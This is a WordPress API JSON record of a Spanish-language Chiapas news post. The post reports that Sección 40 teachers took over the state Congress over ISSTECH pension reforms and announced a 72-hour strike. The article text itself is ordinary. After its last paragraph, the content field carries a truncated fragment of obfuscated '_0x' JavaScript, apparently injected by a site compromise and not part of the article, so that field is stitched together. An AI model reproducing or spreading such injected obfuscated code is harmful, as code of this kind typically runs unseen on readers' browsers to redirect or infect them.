{"id":25152,"date":"2025-11-14T02:41:01","date_gmt":"2025-11-14T02:41:01","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25152"},"modified":"2025-11-14T02:41:01","modified_gmt":"2025-11-14T02:41:01","slug":"maestros-toman-congreso-y-anuncian-nuevo-paro-de-72-horas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25152","title":{"rendered":"Maestros toman Congreso y anuncian nuevo paro de 72 horas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000435927-1024x766.jpg\" alt=\"\" class=\"wp-image-25153\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000435927-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000435927-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000435927-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000435927.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>13 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Este jueves, como parte de un paro de actividades de 48 horas, maestros de la Secci\u00f3n 40 tomaron las instalaciones del Congreso del Estado de Chiapas para exigir la instalaci\u00f3n de una mesa de di\u00e1logo que atienda sus demandas sobre reformas a la Ley del Instituto de Seguridad Social para los Trabajadores del Estado (ISSTECH).<\/p>\n\n\n\n<p>El profesor Mario Rold\u00e1n Roberto L\u00f3pez, Secretario de Organizaci\u00f3n Seccional de la Secci\u00f3n 40, entreg\u00f3 un documento a la mesa directiva del Congreso local donde especifica dos demandas principales: la modificaci\u00f3n del Art\u00edculo 57, que elev\u00f3 las aportaciones de los maestros del 8% al 20.5% de su salario, y la revisi\u00f3n de los Art\u00edculos 100 y 18, para que la jubilaci\u00f3n se determine por a\u00f1os de servicio y no por edad.<\/p>\n\n\n\n<p>&#8220;Es abrumador. Consideramos que estas disposiciones laceran la econom\u00eda del maestro&#8221;, afirm\u00f3 Rold\u00e1n L\u00f3pez durante la protesta.<\/p>\n\n\n\n<p>El l\u00edder sindical anunci\u00f3 que el magisterio se prepara para un pr\u00f3ximo paro de 72 horas, siguiendo los lineamientos de la coordinadora nacional, y inform\u00f3 que este mi\u00e9rcoles se dar\u00e1n a conocer los siguientes pasos de la movilizaci\u00f3n.<\/p>\n\n\n\n<p>En un hecho paralelo, Rold\u00e1n conden\u00f3 la actuaci\u00f3n del gobierno de la Ciudad de M\u00e9xico, encabezado por Claudia Sheinbaum, contra una manifestaci\u00f3n magisterial, donde report\u00f3 que compa\u00f1eros de la Secci\u00f3n 40 fueron recibidos &#8220;con toletes y gases lacrim\u00f3genos&#8221;, dejando varios &#8220;compa\u00f1eros golpeados e intoxicados&#8221;.<\/p>\n\n\n\n<p>&#8220;Definitivamente, al pueblo no le queda duda que ustedes son la continuidad del prianismo y del neoliberalismo en M\u00e9xico&#8221;, sentenci\u00f3.<\/p>\n\n\n\n<p>La movilizaci\u00f3n en Chiapas se mantiene a la espera de una respuesta del Poder Legislativo estatal para establecer las mesas de trabajo que exigen los maestros.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 13 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Este jueves, como parte de un paro de actividades de 48 horas, maestros de la Secci\u00f3n 40 tomaron las instalaciones del Congreso del Estado de Chiapas para exigir la instalaci\u00f3n de una mesa de di\u00e1logo que atienda sus demandas sobre reformas a la Ley del Instituto &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25153,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25152","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25152","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25152"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25152\/revisions"}],"predecessor-version":[{"id":25154,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25152\/revisions\/25154"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25153"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25152"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25152"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25152"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}